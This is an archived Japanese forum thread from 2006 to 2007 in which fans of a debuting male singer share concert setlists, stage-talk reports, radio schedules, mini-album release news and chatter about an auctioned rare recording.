294 :NO MUSIC NO NAME:2006/12/23(土) 12:32:42 ID:GpZnu4hr
昨日は行けなかったけど、クリスマス当たりました。
これってオールスタンディング何かな?
整理番号ないけど、先着順??

295 :NO MUSIC NO NAME:2006/12/24(日) 01:20:58 ID:v/597kxG
J−WAVEの秦くんのライブONAIR待ってるのだが…遅い(-.-;)早くしてくれっ!眠いよ〜

296 :NO MUSIC NO NAME:2006/12/24(日) 01:27:11 ID:64J52kB0
でたね

297 :NO MUSIC NO NAME:2006/12/24(日) 01:40:49 ID:v/597kxG
えっ?!一曲だけ??なんだぁ〜(>o<)

298 :NO MUSIC NO NAME:2006/12/24(日) 02:20:49 ID:vRZMZuSR
今日の大阪のも3曲だったよ。
25日に802で一部オンエアあるみたい。

299 :NO MUSIC NO NAME:2006/12/24(日) 13:48:18 ID:yzZNTiK9
>>286
福岡で話した秦家のクリスマスの話ってどんなの?
よかったら軽くレポ願いたいです。

300 :NO MUSIC NO NAME:2006/12/24(日) 16:07:17 ID:64J52kB0
ききたい!

301 :NO MUSIC NO NAME:2006/12/24(日) 20:01:02 ID:SfxPvv0b
>>286です。


秦の家では毎年、家族でクリスマスプレゼント交換をするんだって。

ニ年前のクリスマスに母(せつ子)から貰ったプレゼントを開けると微妙なセンスの服が入ってたけど
“母さんコレ変だよ”とは申し訳なくて言えなかったから

“ありがとう母さん!すっげぇ気に入ったよ!”

…って、気を使って言ったんだって。


「でも実はその服あれから一度も着てないです。

だから
今日はこの場を借りてせつ子に謝ります。

せつ子、ごめんっ!」


…ってお母さんに謝ってたよ(笑)


長文スマソ。

302 :NO MUSIC NO NAME:2006/12/24(日) 22:41:56 ID:vRZMZuSR
>>301
トントン!
お母さんせつ子って言うんだねw
家族仲良さそうだよね。今実家にいるみたいだし。

303 :NO MUSIC NO NAME:2006/12/24(日) 22:55:53 ID:A4w0YJ4p
アルバム出るのいつ頃になるんだろうか・・・。
毎日2曲じゃ物足りない。

304 :NO MUSIC NO NAME:2006/12/24(日) 23:25:01 ID:X1G4OUIu
>>301
この場を借りずに直接言えよwってツッコミたくなるね

305 :NO MUSIC NO NAME:2006/12/25(月) 00:05:26 ID:CNXvH/7z
>>303
ミニアルバムは来年の3月7日に発売するよ。
詳しくは公式に書いてるけど

306 :NO MUSIC NO NAME:2006/12/25(月) 00:56:51 ID:g12JbLfM
同じ名字やめてほしいし

307 :NO MUSIC NO NAME:2006/12/25(月) 16:31:01 ID:m7sXaCBE
>>294
先着順の気がするけどどうなんだろ?
自分は席があると思い込んでるよw

308 :NO MUSIC NO NAME:2006/12/25(月) 20:55:41 ID:581e2943
今日のライブレポおねがいします!

309 :NO MUSIC NO NAME:2006/12/26(火) 00:07:53 ID:0WMqWC+w
今日のセトリ

青い蝶

ドット
季節が笑う
シンクロ
やわらかな午後に〜
僕らをつなぐもの

アンコール
きよしこの夜


抜けてたら誰か補足お願いします。
今日のライブの模様を収めたDVDがミニアルバムの初回特典につくらしい。

310 :NO MUSIC NO NAME:2006/12/26(火) 00:34:51 ID:3XIqWT7u
トンです!
うわぁ〜アンコールいいなぁ…
でもこれは時期的にもDVDには入らないんだろうなorz
MCで何か特におもしろかったのとかあればヨロ!

311 :NO MUSIC NO NAME:2006/12/26(火) 17:26:39 ID:+/Ftsbx2
秦くんいい声してるよ・・・

312 :NO MUSIC NO NAME:2006/12/26(火) 20:10:12 ID:Mcm+LYho
昨日のトークレポ覚えてる範囲で。

甥っ子にクリスマスプレゼントでバッティングマシーン(子供用?)を
あげたんだけど、思いのほか本格的だったため迷惑がられたってw
ボールも硬いし、浮きあがる高さも身長くらいだったらしいw
その甥っ子をメジャーリーガーにさせたいらしく、ここに関係者が
いたら是非うちの甥っ子をよろしく、みたいなこと話してたよw

曲間のトークはほぼグダグダな感じだったような。
「自分の曲が、聴いてくれる人の身近な存在になってほしい」って
言ってたのが印象的だった。

お客さんもそんなにいなかったし、みんな静かに聴いてる感じだったよ。

他に覚えてる人いたらよろしく。長文スマソ。

313 :NO MUSIC NO NAME:2006/12/26(火) 21:29:12 ID:3XIqWT7u
>>312
トン!
ホントに野球好きなんだなw
DVDには何曲くらい付けてくれるんだろうね。
鱗キボン!

314 :NO MUSIC NO NAME:2006/12/26(火) 21:45:11 ID:ufcmR/k7
昨日は関係者も多数みにきてた。
同じ事務所のアーもいた

315 :NO MUSIC NO NAME:2006/12/26(火) 21:51:58 ID:3XIqWT7u
>>314
誰?スカオ?
せめてもう少し一般人も募集枠ほしかったな…。
招待以外は入れなかったんだよね?

316 :NO MUSIC NO NAME:2006/12/26(火) 21:56:43 ID:bbrovcNs
>>314
誰きてたの?気になる・・・。
自分気づかなかった。

317 :NO MUSIC NO NAME:2006/12/27(水) 04:03:28 ID:9bq6yFxE
>>305
トン!公式しばらく行ってなかったからわかんなかった。
ちょくちょくチェックしとかないとな〜。


318 :NO MUSIC NO NAME:2006/12/27(水) 12:51:02 ID:iUGxziMx
ホンマに『秦』って同じ名字やめてほしいし

319 :NO MUSIC NO NAME:2006/12/27(水) 18:51:13 ID:g3BSPWUX
お兄ちゃんの名前知っとる?

320 :NO MUSIC NO NAME:2006/12/27(水) 23:44:53 ID:Pei/KwfP
前にライブの時、お兄さんみたよ。顔そっくりでわかった。
で、関係者に挨拶してた。体育会系な感じの礼儀ただしい感じだった。
カジュアルなかっこだったから、サラリーマンには見えなかったけど
何やってる人なんだろう。

321 :NO MUSIC NO NAME:2006/12/27(水) 23:50:47 ID:6PHtj1pq
犬猫の殺処分問題を何とかしたいのであれば、
次のHPをできるだけ多くの人に紹介していけばと言われました
児玉小枝さんのホームページ

★電話帳見て、お近くの保健所、動物管理センターに電話して、講習受けに行ったら、ただでもらえます
全国保健所、動物管理・動物愛護・動物保護センター でも検索したらすぐ出ます
広島市ではひきとり可能な子に貰い手がおらず殺処分を待つ状況です 
(〇八二)二四三六〇五八 (´;ω;`) メリークリスマスしたいお

処分の日をドリームデイといいます

このホムペ、目から鱗でした
「動物愛護団体を考えるページ

322 :NO MUSIC NO NAME:2006/12/28(木) 14:42:32 ID:OeDNJkMd
>319
どうしてお兄さんの話になったの?
お兄さんも音楽関係とかですか?

323 :NO MUSIC NO NAME:2006/12/31(日) 03:13:50 ID:j5SJ4JSr
日記更新!
PV撮ってたんだね。僕らをつなぐものか?
だったら切ない感じがいいな

324 :NO MUSIC NO NAME:2007/01/01(月) 01:11:59 ID:eoHhW6Cx
あけおめ!
1/2のFMラジオ ディアフレンズ
お忘れなく!

325 :NO MUSIC NO NAME:2007/01/02(火) 11:59:15 ID:X9hheOII
秦さんラジオ良かった!僕らをつなぐもの流れたね〜。

326 :NO MUSIC NO NAME:2007/01/02(火) 13:51:39 ID:VZlI/nlq
ぐわー聴けなかったー

327 :NO MUSIC NO NAME:2007/01/03(水) 15:29:23 ID:2iV8CMey
僕らをつなぐもの
まじいい…

328 :NO MUSIC NO NAME:2007/01/04(木) 13:49:14 ID:HqrdLojR
ミニアルバムに篠崎正嗣って人が参加してるらしいよ

329 :NO MUSIC NO NAME:2007/01/05(金) 00:27:58 ID:pykAq/pB
ttp://page.auctions.yahoo.co.jp/jp/auction/93361028

おまけに注目

330 :NO MUSIC NO NAME:2007/01/05(金) 00:33:18 ID:0u0nB9iI
早くライブやんないかな〜ミニアルバム出したらやるかな?生歌聞きたいよ…

>>329
ライブ会場とかで知り合えたら自分がタダでダビングしてあげるよ。

331 :NO MUSIC NO NAME:2007/01/05(金) 01:23:11 ID:pykAq/pB
>>330
!! ま、まじですか! ネ申

ただあなた様と知り合える確立がいかほどのものかという(涙)
永く秦くんを見守り続けてこられたのですね。羨ましい。
件のおまけもそうですが、ライブの音が聴きたかったなあ。
二度と聴けない曲が存在していると思うと、
なぜもっと早く出逢わなかったのだろうかと悔やまれる。

今はライブを心待ちに!ミニアルバム辺りに期待ですね。

332 :NO MUSIC NO NAME:2007/01/05(金) 08:42:06 ID:02kJG6Pi
>>330
私もほしいです!
東京住みです!

333 :NO MUSIC NO NAME:2007/01/05(金) 13:27:44 ID:0u0nB9iI
>>331
自分は去年のオーキャンで知った新参ですよ。
なので昔の音源聞きたい気持ちは分かりますから。

>>332
ライブ会場などで知り合えたらあげますよ。

あんまりこんなこと言わない方が良かったかな?
以後スルーで

334 :NO MUSIC NO NAME:2007/01/05(金) 23:08:37 ID:pykAq/pB
お仲間でしたか。お気持ちありがトン。

あー早くライブーーー!せめてテレビ放送。
秦不足なので録画したオシャラでも見よう。

335 :NO MUSIC NO NAME:2007/01/06(土) 00:21:58 ID:bTAJfyt5
公式のトップが変わってる!
かっこえぇ〜!!
早くライブ行きたい!

336 :NO MUSIC NO NAME:2007/01/06(土) 00:29:10 ID:9ANhQmEL
かっ、かっこえー!!
BBSで言ってる人いるけど、これジャケ写なん?

でもちょっと長澤っぽいとオモタw


337 :NO MUSIC NO NAME:2007/01/06(土) 00:34:03 ID:JfVyCsNb
>>336
仲間発見!一瞬間違えたかと思った
でもかっこいいねー どっちかって言うとアー写みたいだな。

338 :NO MUSIC NO NAME:2007/01/06(土) 01:57:59 ID:IOocCAKb
>>336
BMGのサイトにはちょっと違う感じのがジャケ写で載ってた。
そっちもモノクロ。両方とも若干ワイルド系か?

どちらかというとこういうのは長澤の方が・・・

339 :NO MUSIC NO NAME:2007/01/06(土) 02:10:49 ID:9ANhQmEL
>>337-338
雰囲気がねー、似てる。
ワイルドは歌も見てくれも長澤の方がハマるかなあ。
BMGのはオサーンぽくてあんま好きじゃないorz
もちっと繊細でフレッシュな印象のがいいような・・・
ま、なんだかんだ言ってトップのはカコイーくて好きだw

340 :NO MUSIC NO NAME:2007/01/06(土) 21:36:31 ID:vB3WA9Bc
僕らをつなぐもの 解禁日はいつ?

341 :NO MUSIC NO NAME:2007/01/06(土) 23:36:44 ID:9ANhQmEL
奥、すご・・・

342 :NO MUSIC NO NAME:2007/01/07(日) 00:05:55 ID:Ep/LNxMr
すごすぎて手が出なかった・・

343 :NO MUSIC NO NAME:2007/01/07(日) 00:11:01 ID:1Bk0PTnP
CDRコピーで一枚きりの内容であの値段は
自分も手出せなかったわ。
でももう少し売れ出したらまだ値は上がると思われ…
でも秦はライブで聞きたいアーだったりするんで
ライブもっとやってくれい!

344 :NO MUSIC NO NAME:2007/01/07(日) 00:29:23 ID:MYCybZp7
オクいくらになったの?
自分見た時は550円だったけど。

345 :NO MUSIC NO NAME:2007/01/07(日) 14:00:08 ID:Ep/LNxMr
>>344
最終的に12000円になったよ

346 :NO MUSIC NO NAME:2007/01/07(日) 15:41:04 ID:MYCybZp7
>>345d!
そんなに高かったんだ…
デビュー間もない今でその値段なら
この先有名になったら一体いくらになるのだ…
そう考えると安いのか!?ま、手は出ないけどね…
でもコピーなんだよね…現物なら一体…

347 :NO MUSIC NO NAME:2007/01/08(月) 15:39:30 ID:BjKv4ZMW
ラジオいつ出るネ-(・∀・)?

348 :NO MUSIC NO NAME:2007/01/08(月) 23:17:08 ID:wAC5NsWb
九州で今日のラジオを聴けなかった負け組です。聴けた方は是非レポをキボン

349 :NO MUSIC NO NAME:2007/01/08(月) 23:17:19 ID:w0eWmNeN
どんなアーだって生歌がいいだろうけど

こんなに生歌が聞きたくて堪らないアーは初めてかも…
インストアイベント以来聞いてないよ〜
ミニアルバムまで待てない…

350 :NO MUSIC NO NAME:2007/01/08(月) 23:31:23 ID:E3dusObd
>>349
禿禿同意!!
生歌まじいいよね。
バックバンドとかいらないし!

351 :NO MUSIC NO NAME:2007/01/09(火) 00:12:03 ID:XQkd10wU
>>347
公式の発表通り16時頃出た。
今日もシンクロ・やわらかな〜・ぼくらを〜を歌ったが、
2曲目の途中でギターの弦が切れて「リトルパニック」だったらしい

352 :NO MUSIC NO NAME:2007/01/09(火) 10:42:43 ID:aZWNlkLh
昨日ラジオあったんですね−…ショック!今知ってしまった…(T_T)聞きたかったよぉ〜

353 :NO MUSIC NO NAME:2007/01/09(火) 10:52:27 ID:QVUxRes2
昨日のJ波ホリスペ中のライブ、
外出中で録れなかったのが心残りだ。
漏れが♂ソロアーティストに注目するのは
岡村靖幸、森広隆に続いて三人目だ。


354 :NO MUSIC NO NAME:2007/01/09(火) 21:37:25 ID:fkELEilQ
>>353
森広隆、俺も好きだ。

355 :NO MUSIC NO NAME:2007/01/09(火) 21:51:20 ID:yXRgomnS
>>353,354
奇遇だな。

356 :NO MUSIC NO NAME:2007/01/10(水) 00:54:58 ID:lPCZN2pl
>>353,354,355
おお、奇遇だな

357 :NO MUSIC NO NAME:2007/01/10(水) 10:30:30 ID:pkkqkTV/
んで、やっぱり岡村ちゃんは受け入れられにくい件w


358 :NO MUSIC NO NAME:2007/01/10(水) 16:29:25 ID:RGsfobe7
動画がアップされてるよ。
トップの秦はやっぱ別人だwそれぐらいかっこええw
まぁいい曲出してくれればどんな秦でも好きだw

74 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)